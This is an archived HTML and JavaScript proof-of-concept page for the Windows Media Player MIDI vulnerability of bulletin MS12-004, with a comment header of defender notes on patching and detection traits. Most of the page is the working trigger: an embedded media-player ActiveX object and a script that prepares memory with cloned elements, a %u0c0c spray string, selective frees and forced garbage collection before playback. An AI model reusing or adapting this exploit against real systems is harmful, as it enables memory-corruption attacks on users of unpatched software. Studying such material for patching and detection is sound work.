// http://sebug.net/paper/Exploits-Archives/2012-exploits/1201-exploits/MS12-004_poc.zip
<!--
  Archived proof-of-concept page; the source URL above ties it to bulletin MS12-004.
  It has two parts: a Windows Media Player ActiveX object pointed at a MIDI file
  (./toto.mid, which is not included on this page), and a script that allocates and
  partially releases DOM objects before asking the control to play that file.

  Defender notes:
  * Remediation is the vendor update for the bulletin named in the URL. Restricting
    ActiveX instantiation for untrusted zones should reduce exposure on hosts that
    cannot be patched (confirm against the bulletin's own guidance).
  * Traits visible in this page that content inspection can match on: the media player
    classid embedded together with a .mid source, an explicit CollectGarbage() call,
    long unescape("%u0c0c...") strings, and bulk cloneNode() of an element carrying
    many expando properties.
-->
<object id="midi1" classid="clsid:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#version=5,1,52,701" standby="loading microsoft windows media player components..." type="application/x-oleobject" width="320" height="310">
    <param name="filename" value="./toto.mid">
    <param name="animationatstart" value="true">
    <param name="transparentatstart" value="true">
    <param name="autostart" value="false">
    <param name="showcontrols" value="true">
    <param name="ShowStatusBar" value="true">
    <param name="windowlessvideo" value="true">
    <embed src="./toto.mid" autostart="true" showcontrols="true" showstatusbar="1" bgcolor="white" width="320" height="310">
</object>
<script>
// Holds the cloned <select> elements; numCloned fixes how many are created (50).
var cloned = new Array();
var numCloned = 50;

/**
 * Second stage, scheduled by exploit() to run 5 seconds after playback is requested.
 * Walks the clone pool and calls toString() on property w0 of every entry that was
 * not set to null. The result is kept only in a local variable; the alert that would
 * display it is commented out, so this function reports nothing.
 */
function bang() {
    for (var i = 0; i < numCloned; i ++) {
        if ( cloned[i] != null ) {
            var s = cloned[i].w0.toString();
            //alert(s);
        }
    }
}

/**
 * First stage, scheduled 3 seconds after the script is evaluated.
 * Builds one <select> element, attaches expando properties w0..w59 of assorted types,
 * clones it numCloned times, drops some clones, forces a collection, then asks the
 * embedded media player object (id "midi1") to play its file.
 * NOTE(review): the mix of value types and the release pattern look intended to
 * influence memory layout around the media component's allocations. That cannot be
 * verified from this page alone, because the MIDI file is not shown.
 */
function exploit() {
    var selob = document.createElement("select");
    // w0 is the only property bang() reads back later.
    selob.w0 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");
    selob.w1 = this;
    selob.w2 = new Array();
    selob.w3 = true;
    selob.w4 = 0x41424344;
    selob.w5 = document.createElement("marquee");
    selob.w6 = undefined;
    selob.w7 = null;
    selob.w8 = alert;
    selob.w9 = RegExp.$1;
    selob.w10 = Infinity;
    selob.w11 = NaN;
    selob.w12 = new Date();
    // The loop starts at 12, so the Date assigned to w12 just above is overwritten.
    for (var i = 12; i < 60; i ++) {
        selob["w"+i.toString()] = 0x41424344;
    }
    // Fill the pool with deep clones of the prepared element.
    for (var i = 0; i < numCloned; i ++) {
        cloned[i] = selob.cloneNode(true);
    }
    // Drop the reference to every 7th clone, starting at index 1.
    for (var i = 1; i < numCloned; i += 7) {
        cloned[i] = null;
    }
    // CollectGarbage() is an Internet Explorer-specific call; other engines do not define it.
    CollectGarbage();
    // Playback is started from script; the <param name="autostart"> above is "false".
    midi1.play();
    setTimeout(function(){bang();}, 5000);
}

// Entry point: defer the first stage by 3 seconds.
setTimeout(function(){exploit();}, 3000);
</script>